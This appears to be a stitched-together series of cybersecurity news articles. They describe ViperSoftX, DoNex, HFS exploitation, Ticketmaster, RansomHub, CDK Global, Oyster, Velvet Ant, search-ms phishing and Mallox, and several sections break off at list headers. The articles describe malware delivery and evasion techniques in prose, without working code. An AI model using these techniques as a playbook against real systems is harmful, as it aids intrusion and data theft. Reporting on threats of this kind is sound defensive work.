Researchers have found new advancements in the ViperSoftX info-stealing malware, which was first discovered in 2020. This malware has become more sophisticated, using advanced techniques to avoid detection. One of its new methods is using the Common Language Runtime (CLR) to run PowerShell commands within AutoIt scripts, which are spread through pirated eBooks. This clever approach helps the malware to hide within normal system activities, making it harder for security software to detect.
How ViperSoftX Spreads
ViperSoftX spreads through torrent sites by pretending to be eBooks. The infection starts when users download a RAR archive that includes a hidden folder, a deceptive shortcut file that looks like a harmless PDF or eBook, and a PowerShell script. The archive also contains AutoIt.exe and AutoIt script files disguised as simple JPG image files. When a user clicks the shortcut file, it sets off a series of commands, starting with listing the contents of “zz1Cover4.jpg.” These commands are hidden within blank spaces and executed by PowerShell, performing various malicious actions.
What the Malware Does
According to researchers from Trellix, the PowerShell code performs several tasks, such as unhiding the hidden folder, calculating the total size of all disk drives, and setting up Windows Task Scheduler to run AutoIt3.exe every five minutes after the user logs in. This ensures the malware remains active on infected systems. Additionally, the malware copies two files to the %APPDATA%MicrosoftWindows directory, renaming them to .au3 and AutoIt3.exe.
A sneaky aspect of ViperSoftX is its use of CLR to run PowerShell within AutoIt, a tool normally trusted by security software for automating Windows tasks. This allows the malware to avoid detection. ViperSoftX also uses heavy obfuscation, including Base64 encoding and AES encryption, to hide commands in the PowerShell scripts extracted from image decoy files. This makes it difficult for researchers and analysis tools to understand what the malware does.
Additionally, ViperSoftX tries to modify the Antimalware Scan Interface (AMSI) to bypass security checks. By using existing scripts, the malware developers can focus on improving their evasion tactics.
The malware's network activity shows it tries to blend its traffic with legitimate system activity. Researchers noticed it uses deceptive hostnames, like security-microsoft[.]com, to appear more trustworthy and trick victims into thinking the traffic is from Microsoft. Analysis of a Base64-encoded User-Agent string revealed detailed system information gathered from infected systems, such as disk volume serial numbers, computer names, usernames, operating system versions, antivirus product information, and cryptocurrency details.
Researchers warn that ViperSoftX is becoming more dangerous. Its ability to perform malicious actions while avoiding traditional security measures makes it a serious threat. As ViperSoftX continues to evolve, it's essential for users to stay alert and use strong security practices to protect their systems from such advanced threats.
Experts uncovered a critical flaw in the encryption schema of the DoNex ransomware, including all variations and predecessors. Since March 2024, they've worked with law enforcement to give a decryptor to affected DoNex victims covertly.
The cryptographic vulnerability was widely discussed at Recon 2024, compelling the researchers to reveal the problem and its ramifications publically.
Avast researchers discovered that the DoNex ransomware went through many rebrandings after its original identification as Muse in April 2022. Subsequent revisions of DoNex included a rebrand to a reported Fake LockBit 3.0 in November 2022, followed by DarkRace in May 2023, and lastly DoNex in March 2024.
Since April 2024, the team has discovered no further copies, and the ransomware group's public TOR address remained dormant, implying that DoNex's evolution and rebranding efforts may have ended.
The DoNex malware uses a complicated encryption method. During execution, the CryptGenRandom function generates an encryption key. This key creates a ChaCha20 symmetric key, which is later used to encrypt files.
Following encryption, the symmetric key is encrypted with RSA-4096 and appended to the impacted file. Files up to 1 MB are encrypted in their whole, whilst larger files are encrypted in block segments. An XOR-encrypted configuration file stores the ransomware's configuration, as well as information on whitelisted extensions, files, and services to terminate.
While the researchers have not described the specific process they used to understand the decryption, more information about the same cryptographic flaw is available in files related to the Recon 2024 event lecture titled "Cryptography is hard: Breaking the DoNex ransomware." The event was hosted by Gijs Rijnders, a malware reverse engineer and cyber threat intelligence specialist of the Dutch National Police.
DoNex particularly targeted victims in the United States, Italy, and Belgium with tailored attacks. The researchers confirmed that the leaked DoNex decryptor can decrypt all forms of the DoNex ransomware, including earlier versions.
Victims of the DoNex ransomware can identify an attack based on the ransom note left by the software. Although several varieties of DoNex (Fake LockBit, DarkRace, and DoNex) create different ransom notes, they all have the same layout.
Cybersecurity researchers have identified a wave of attacks targeting outdated versions of the HTTP File Server (HFS) software from Rejetto, aiming to distribute malware and cryptocurrency mining tools. These attacks exploit a critical security flaw known as CVE-2024-23692, which allows hackers to execute arbitrary commands without needing authentication.
CVE-2024-23692 is a high-severity vulnerability discovered by security researcher Arseniy Sharoglazov. It was publicly disclosed in May this year, following a detailed technical report. The flaw is a template injection vulnerability that enables remote attackers to send specially crafted HTTP requests to execute commands on the affected systems. The vulnerability affects HFS versions up to and including 2.3m. In response, Rejetto has issued a warning to users, advising against the use of these versions due to their susceptibility to control by attackers.
Researchers at AhnLab Security Intelligence Center (ASEC) have observed multiple attacks on version 2.3m of HFS. This version remains popular among individuals, small teams, educational institutions, and developers for network file sharing. The attacks likely began after the release of Metasploit modules and proof-of-concept exploits soon after the vulnerability's disclosure.
During these attacks, hackers gather information about the compromised system, install backdoors, and deploy various types of malware. Commands such as "whoami" and "arp" are executed to collect system and user information and identify connected devices. Hackers also add new users to the administrators' group and terminate the HFS process to prevent other threat actors from exploiting the same vulnerability.
In several cases, the XMRig tool, used for mining Monero cryptocurrency, was installed. ASEC researchers attribute one of these attacks to the LemonDuck threat group. Other malware payloads deployed include:
1. XenoRAT: A tool for remote access and control, often used alongside XMRig.
2. Gh0stRAT: Used for remote control and data exfiltration.
3. PlugX: A backdoor associated with Chinese-speaking threat actors, providing persistent access.
4. GoThief: An information stealer that uses Amazon AWS for data exfiltration, capturing screenshots, collecting desktop file information, and sending data to an external command and control server.
AhnLab continues to detect attacks on HFS version 2.3m. Given that the server must be online for file sharing, it remains a lucrative target for hackers. Rejetto recommends users switch to version 0.52.x, which is the latest release despite its lower version number. This version is web-based, requires minimal configuration, and supports HTTPS, dynamic DNS, and administrative panel authentication.
The company has also provided indicators of compromise, including malware hashes, IP addresses of command and control servers, and download URLs for the malware used in these attacks. Users are urged to update their software to the latest version and follow cybersecurity best practices to protect their systems from such vulnerabilities.
By assimilating and addressing these vulnerabilities, users can better secure their systems against these sophisticated attacks.
The breach, initially believed to be limited in scope, has now escalated, affecting millions of ticket holders, including fans attending Taylor Swift’s Eras Tour. Let’s delve into the details of this high-stakes cybercrime.
In an email sent to affected customers, Ticketmaster said that they had discovered "unauthorised activity" in a third-party cloud database, and that personal data of "some customers" who purchased tickets to events in North America (the United States, Canada, and/or Mexico) could have been compromised.
Ticketmaster confirmed that unauthorized access occurred, leading to the compromise of sensitive customer data. The hackers gained access to 193 million ticket barcodes, valued at an astonishing $22.6 billion. Among these, 440,000 tickets belong to Taylor Swift’s ongoing tour, leaving fans anxious and concerned.
ShinyHunters, known for their audacity, demanded an $8 million ransom for the safe return of the stolen data. The group threatened to leak the ticket barcodes if their demands were not met promptly. Ticketmaster faced a dilemma: pay the ransom or risk exposing millions of customers’ personal information.
The American Ticket Sales and Distribution Company shared, "Ticketmaster’s SafeTix technology protects tickets by automatically refreshing a new and unique barcode every few seconds so it cannot be stolen or copied. This is just one of many fraud protections we implement to keep tickets safe and secure."
"Some outlets are inaccurately reporting about a ransom offer. We were never engaged for a ransom and did not offer them money," Ticketmaster confirmed.
Customers trust platforms like Ticketmaster with their personal details, including names, addresses, and payment information. The breach jeopardizes this trust and raises questions about data security practices within the industry.
Ticketmaster faces a double bind: pay the ransom and potentially encourage further attacks, or refuse and risk public outrage. The financial implications extend beyond the ransom amount. Legal fees, compensation to affected customers, and damage control efforts will strain the company’s resources.
Ticketmaster’s reputation hangs in the balance. Swift action is crucial to mitigate reputational harm. Customers may think twice before purchasing tickets through the platform, affecting future sales and partnerships.
Cloud Europe is a Tier IV carrier-neutral data center based in Rome's Tecnopolo Tiburtino. According to the company's website, it specializes in data center architecture and management, focusing on security and service continuity. The company creates, hosts, and operates modular infrastructure for data centers in both the private and public sectors.
1. Cloud Europe: On June 29, 2024, RansomHub claimed responsibility for infiltrating the servers of Cloud Europe, a prominent Tier IV certified data center in Rome. The attackers allegedly encrypted the servers and exfiltrated 70 terabytes of data. Among the stolen information were 541.41 gigabytes of sensitive data, including client records, financial documents, and proprietary software.
2. Mangimi Fusco: The same day, RansomHub targeted Mangimi Fusco, an animal food manufacturer. The group claimed to have stolen 490 gigabytes of confidential data, including client files, budget details, and payroll information. However, as of now, Mangini Fusco’s website shows no signs of the reported attack, leaving room for skepticism.
3. Francesco Parisi: RansomHouse, another hacking collective, breached the website of Francesco Parisi, a group specializing in freight forwarding and shipping services. The attack occurred on May 29, 2024, and resulted in the theft of 150 gigabytes of company data. Francesco Parisi has acknowledged the breach and is working to restore normalcy while enhancing its cybersecurity defenses.
These attacks raise critical questions about the state of cybersecurity readiness among Italian businesses:
Vulnerabilities: Despite advancements in security protocols, organizations remain vulnerable to sophisticated attacks. The ability of threat actors to infiltrate well-established data centers and corporate websites highlights the need for continuous vigilance.
Data Privacy: The stolen data contains sensitive information that could be exploited for financial gain or used maliciously. Companies must prioritize data privacy and invest in robust encryption, access controls, and incident response plans.
Business Continuity: When ransomware strikes, business operations grind to a halt. Cloud Europe’s experience serves as a stark reminder that even data centers, designed to ensure continuity, are not immune. Organizations must have contingency plans to minimize disruptions.
To safeguard against ransomware and other cyber threats, companies should consider the following strategies:
The automotive industry has faced an unprecedented challenge: a cyberattack targeting CDK Global, a major software provider for auto dealerships. This incident has sent shockwaves through the industry, affecting dealerships across the United States. In this blog post, we’ll delve into the details of the attack, its consequences, and the lessons we can learn from it.
CDK Global, a company that provides software solutions to auto dealers, fell victim to a ransomware attack. The attack was orchestrated by a group known as BlackSuit, which demanded a hefty ransom from CDK. As a precautionary measure, CDK temporarily shut down most of its systems to prevent further damage and protect its customers.
Several major auto dealership groups reported disruptions:
Lithia Motors: Lithia Motors, one of the largest dealership networks in the U.S., faced operational challenges due to the CDK cyberattack. Their day-to-day processes, including inventory management and customer interactions, were affected.
Group 1 Automotive: Group 1 Automotive, another prominent player in the industry, experienced delays in vehicle sales and service. The attack disrupted their ability to process transactions efficiently.
Penske Automotive Group: Penske, a well-known name in auto retail, struggled with system outages. Their sales teams couldn’t access critical information, impacting customer service.
Sonic Automotive: Sonic Automotive’s dealerships grappled with inventory discrepancies. The attack disrupted their supply chain management, leading to delays in vehicle deliveries.
Asbury Automotive Group: Asbury Automotive Group faced challenges in communicating with customers. Their CRM systems were offline, affecting follow-ups and lead management.
AutoNation: AutoNation, a nationwide dealership network, had to adapt quickly. The attack disrupted their online sales platforms, affecting customer inquiries and transactions.
The CDK incident underscores the importance of robust cybersecurity measures. Dealerships must invest in secure infrastructure, regular vulnerability assessments, and employee training. Cyber hygiene is crucial to prevent and mitigate attacks.
Having a well-defined incident response plan is essential. Dealerships should know how to react swiftly when faced with a cyber threat. Regular drills and simulations can help teams prepare for such scenarios.
Dealerships rely on third-party vendors like CDK for critical services. Assessing vendor security practices and ensuring contractual obligations related to cybersecurity are met is vital. Regular audits can help identify vulnerabilities.
According to people familiar with the situation, the BlackSuit ransomware gang is responsible for CDK Global's significant IT failure and interruption to car dealerships throughout North America.
The conversations follow the BlackSuit ransomware assault, which led CDK to lock down its IT infrastructure and data centers, including its car dealership platform, to prevent the attack from spreading. The company attempted to restore services on Wednesday, but a second cybersecurity attack forced it to shut down all IT systems again.
CDK Global, a leading provider of technology solutions for auto dealerships, found itself in the crosshairs of cybercriminals.
While the company has yet to officially confirm the ransomware attack, multiple sources indicate that BlackSuit is behind the incident. The attack likely exploited vulnerabilities in CDK’s systems, leading to widespread disruption.
The fallout from the CDK Global outage has been substantial. Car dealerships rely heavily on CDK’s software for inventory management, sales, and customer service.
With the systems down, dealers have had to resort to manual processes, including pen-and-paper record-keeping. Imagine the chaos in a busy dealership trying to manage sales, service appointments, and parts inventory without their usual digital tools.
Beyond the immediate operational challenges, there are serious concerns about data theft. Ransomware attacks often involve stealing sensitive information before encrypting files and demanding a ransom.
CDK Global must now investigate whether customer data, financial records, or other critical information has been compromised. The potential fallout from such a breach could be long-lasting and damaging.
CDK Global’s response to the attack is crucial. They need to assess the extent of the breach, restore systems, and enhance security measures. Communication with affected dealerships is equally important. Dealers need transparency about the situation, timelines for resolution, and guidance on how to navigate the outage.
According to Steve Stone, president of Rubrik's Zero Labs, ransomware is one of the levers changing how enterprises think about risk. Zero Labs' latest analysis shows that healthcare firms are more likely to lose 20% of their sensitive data after a ransomware attack.
This blog post will explore why healthcare organizations are at risk and discuss strategies to mitigate these threats.
Healthcare organizations handle vast amounts of sensitive data, including patient records, medical histories, and financial information. This data is a goldmine for cybercriminals seeking economic gain. According to recent reports, healthcare data breaches cost organizations an average of $7.13 million per incident. The sheer volume of sensitive data makes healthcare an attractive target.
While ransomware operators don’t exclusively focus on healthcare, the industry shares architectural nuances with other sectors. For instance:
Legacy Systems: Many healthcare institutions still rely on legacy systems that lack robust security features. These outdated systems are more susceptible to attacks.
Interconnected Networks: Healthcare networks connect various entities—hospitals, clinics, laboratories, and insurance providers. This interconnectedness creates multiple entry points for attackers.
Medical Devices: Internet of Things (IoT) devices, such as MRI machines and infusion pumps, are integral to patient care. However, they often lack proper security controls, making them vulnerable.
Preventing ransomware starts with understanding your risk surface area. Here’s how healthcare organizations can reduce their exposure:
Identity Management: Properly managing user identities and access rights is crucial. Limiting access to sensitive data based on roles and responsibilities helps prevent unauthorized changes.
Data Visibility: Organizations must know where sensitive data resides, both on-premises and in the cloud. Regular audits and data classification are essential.
Backup and Recovery: Robust backup solutions are critical. Regularly backing up data ensures that even if ransomware strikes, organizations can restore systems without paying the ransom.
Healthcare organizations face unique challenges in incident response:
Hybrid Environments: Many healthcare systems operate in hybrid environments—partly on-premises and partly in the cloud. Coordinating incident response across these environments can be complex.
Patient Safety: Ransomware attacks can disrupt critical services, affecting patient care. Balancing data protection with patient safety is a delicate task.
Collaboration: Effective incident response requires collaboration among IT teams, legal departments, and external cybersecurity experts.
“Rapid7 observed that the websites were masquerading as Microsoft Teams websites, enticing users into believing they were downloading legitimate software when, in reality, they were downloading the threat actor’s malicious software,” said the report.
The modus operandi of this campaign involves luring users to malicious websites. The threat actors create typo-squatted sites that closely mimic legitimate platforms. For instance, users searching for Microsoft Teams might inadvertently land on a fake Microsoft Teams download page. These malicious websites host supposed software installers, enticing users to download and install the application.
However, the catch lies in the content of these fake installers. When users download them, they unknowingly execute the Oyster backdoor. This stealthy piece of malware allows attackers to gain unauthorized access to compromised systems.
Once the backdoor is in place, attackers can engage in hands-on keyboard activity, directly interacting with the compromised system. Furthermore, the Oyster backdoor can deploy additional payloads after execution, potentially leading to further compromise or data exfiltration.
The impact on users who fall victim to this malvertising campaign can be severe. They inadvertently install the Oyster backdoor on their systems, providing attackers with a foothold. From there, attackers can escalate privileges, steal sensitive information, or launch other attacks.
To reduce such risks, users should remain vigilant:
According to a Sygnia report, which discovered the breach after being called in to investigate the cyberattack, Velvet Ant established multiple footholds across the network, including a legacy F5 BIG-IP appliance that served as an internal command and control (C2) server.
The ‘Velvet Ant’ group, suspected to have ties to Chinese state-sponsored actors, has been active since at least 2017. Their primary focus is on cyber espionage, targeting government entities, defense contractors, and critical infrastructure organizations. Their modus operandi involves gaining persistent access to internal networks, exfiltrating sensitive data, and maintaining long-term presence without detection.
F5 BIG-IP appliances are widely used for load balancing, application delivery, and security functions. Unfortunately, their ubiquity also makes them an attractive target for threat actors. The ‘Velvet Ant’ group leverages vulnerabilities in these devices to achieve their objectives.
The Windows Search protocol is a Uniform Resource Identifier (URI) that allows applications to open Windows Explorer and perform searches with specific parameters. Typically, these searches are conducted on the local device’s index. However, attackers have discovered that it’s possible to manipulate Windows Search to query file shares on remote hosts, presenting these remote files as if they were local.
The recent phishing attacks, as detailed in a report by Trustwave SpiderLabs, start with a seemingly innocuous email. The email contains an HTML attachment disguised as an invoice document within a ZIP archive. This ZIP file format helps evade many security and antivirus scanners that might not inspect the contents thoroughly.
Upon opening the HTML file, it uses a `<meta http-equiv="refresh">` tag to automatically redirect the browser to a malicious URL. A clickable anchor tag provides a fallback mechanism if the automatic redirect fails due to browser settings or other reasons. This URL exploits the Windows Search protocol to perform a search on a remote host.
The search parameters in this phishing attack are ingeniously crafted to mislead users. The query searches for items labeled "INVOICE," while the crumb parameter sets the search scope, directing it to a malicious server through Cloudflare. The display name is altered to "Downloads," giving the appearance of a legitimate interface. Additionally, Cloudflare's tunnelling service masks the server, making the remote resources appear as though they are local files.
The search results display a single shortcut (LNK) file named as an invoice. When the victim clicks on this file, it triggers a batch script (BAT) hosted on the same remote server.
The exact operations of the batch script remain unknown, as Trustwave researchers could not analyse it due to the server being offline at the time of their investigation. However, the potential for harmful activities, such as data theft or system compromise, is significant.
To defend against this threat, Trustwave suggests removing registry entries associated with the search-ms/search URI protocol. This can be done by executing specific commands in the registry editor. However, this action should be taken cautiously as it may disrupt legitimate applications and Windows features that rely on this protocol.
This new phishing method highlights the twisted tactics of cybercriminals and the importance of staying vigilant. Users and organisations must be aware of such threats and implement robust security measures to protect against these sophisticated attacks. Regular updates to security protocols and awareness training can help mitigate the risks posed by these kinds of phishing campaigns.
A new and intricate alware campaign has been discovered by Trustwave SpiderLabs, leveraging the Windows search feature embedded in HTML code to spread malicious software. The attack begins with a phishing email containing an HTML attachment disguised as a routine document, such as an invoice. To deceive users and evade email security scanners, the HTML file is compressed within a ZIP archive. This extra layer of obfuscation reduces the file size for quicker transmission, avoids detection by some email scanners, and adds a step for users, potentially bypassing simpler security measures. Notably, this campaign has been observed in limited instances.
HTML Attachment Mechanics
Once the HTML attachment is opened, it triggers a complex attack by abusing standard web protocols to exploit Windows system functionalities. A critical component of the HTML code is the `<meta http-equiv="refresh"` tag, which automatically reloads the page and redirects to a new URL with zero delay, making the redirection instant and unnoticed by the user. Additionally, an anchor tag serves as a fallback mechanism, ensuring the user is still at risk even if the automatic redirect fails.
Exploitation of the Search Protocol
When the HTML file loads, browsers typically prompt users to allow the search action as a security measure. The redirection URL uses the `search:` protocol, allowing applications to interact directly with Windows Explorer's search function. The attackers exploit this protocol to open Windows Explorer and perform a search with parameters they crafted. These parameters direct the search to look for items labelled as "INVOICE," control the search scope to a specific directory, rename the search display to "Downloads" to appear legitimate, and hide their malicious operations using Cloudflare’s tunnelling service.
Execution of Malicious Files
After the user permits the search action, Windows Explorer retrieves files named "invoice" from a remote server. Only one item, a shortcut (LNK) file, appears in the search results. This LNK file points to a batch script (BAT) hosted on the same server. If the user clicks the file, it could trigger additional malicious operations. At the time of analysis, the payload (BAT) could not be retrieved as the server was down, but the attack demonstrates a sophisticated understanding of exploiting system vulnerabilities and user behaviour.
To prevent exploitation of the `search-ms` and `search` URI protocols, one mitigation strategy is to disable these handlers by deleting the associated registry entries. This can be achieved using specific commands.
This attack surfaces the importance of user awareness and proactive security strategies. While it does not involve automated malware installation, it requires users to engage with various prompts and clicks, cleverly obscuring the attackers' true intent. As the threat landscape becomes more complex, continuous education and robust security measures are vital to protect against such deceptive tactics.
Trustwave SpiderLabs has updated its MailMarshal software to detect and block HTML files that abuse the search URI handler, offering additional protection for users.
The Mallox ransomware organization is targeting VMware ESXi setups with a new Linux strain that uses a novel mechanism to transmit and execute its payload only on workstations with high-level user capabilities.
The variant, discovered by Trend Micro researchers who monitor Mallox as TargetCompany, specifically determines whether a targeted system is running in a VMware ESXi environment has administrative rights, and will not launch an attack if these conditions are not met.
Mallox, also known as Fargo and Tohnichi, first appeared in June 2021 and claims to have infected hundreds of organizations worldwide. The group's targeted sectors include manufacturing, retail, wholesale, legal, and professional services. According to Trend Micro, the most active Mallox sites this year are in Taiwan, India, Thailand, and South Korea.
The Linux variation is the first time Mallox has been seen employing a customized shell script to deliver and execute ransomware on virtualized environments, indicating that the activity was likely intended to cause more disruption and, as a result, increase the chances of a ransom payment.
Also, the adversary responsible for wielding the variant is a Mallox affiliate known as "vampire," implying the group's involvement in "broader campaigns involving high ransom demands and expansive IT system targeting," Trend Micro's Darrel Tristan Virtusio, Nathaniel Morales, and Cj Arsley Mateo wrote in the post.
The usage of a customized shell also suggests that Mallox "has been continuously evolving to employ more sophisticated methods in its future attacks," the researchers wrote.
This freshly discovered Linux variant is consistent with the recent trend of ransomware gangs expanding their attacks to important Linux environments, potentially increasing the number of target victims.
On top of to delivery and execution, the unique shell sends the victim's information to two additional servers, allowing the ransomware perpetrators to have a backup. Mallox is reported to have used a leak site with the same name to reveal data obtained during ransomware assaults.
This current variant first examines a system to verify if the executable is executing with administrative privileges; if not, it will not continue its operation.
Following execution, the variation creates a text file named TargetInfo.txt that contains victim information and sends it to a command-and-control (C2) server, similar to the Windows version of Mallox ransomware.
The IP address used to steal this information and later execute the payload was not previously used by Mallox. According to the researchers, it is hosted by China Mobile Communications, a Chinese ISP, and was most likely hired by the threat actor for a brief period to host its malicious payload.
The program also checks to see if the system name matches "vmkernel," indicating that the machine is running VMware's ESXi hypervisor. If that's the case, it uses its encryption process, attaching the ".locked" extension to encrypted files and dropping a ransom letter called HOW TO DECRYPT.txt. The researchers found that both the extension and the note deviate from the Windows variant.
The custom shell script used to download and execute the payload can also exfiltrate data to another server. When the ransomware completes its routine, it reads the contents of the dropped text file and uploads it to another URL.
The variation also exports victim information to two distinct sites, possibly "to improve redundancy and have a backup in case a server goes offline or is compromised," the researchers stated.
After the ransomware completes its routine, the script deletes the TargetCompany payload, making it even more difficult for security to determine the full impact of the attack, complicating investigation and incident response.
Mallox's clever expansion of its assault activities into Linux platforms running VMware ESXi necessitates more vigilance on the part of enterprises fitting this description, according to the researchers.
The researchers proposed that enterprises implement multifactor authentication (MFA) to prevent attackers from executing lateral movement within a network.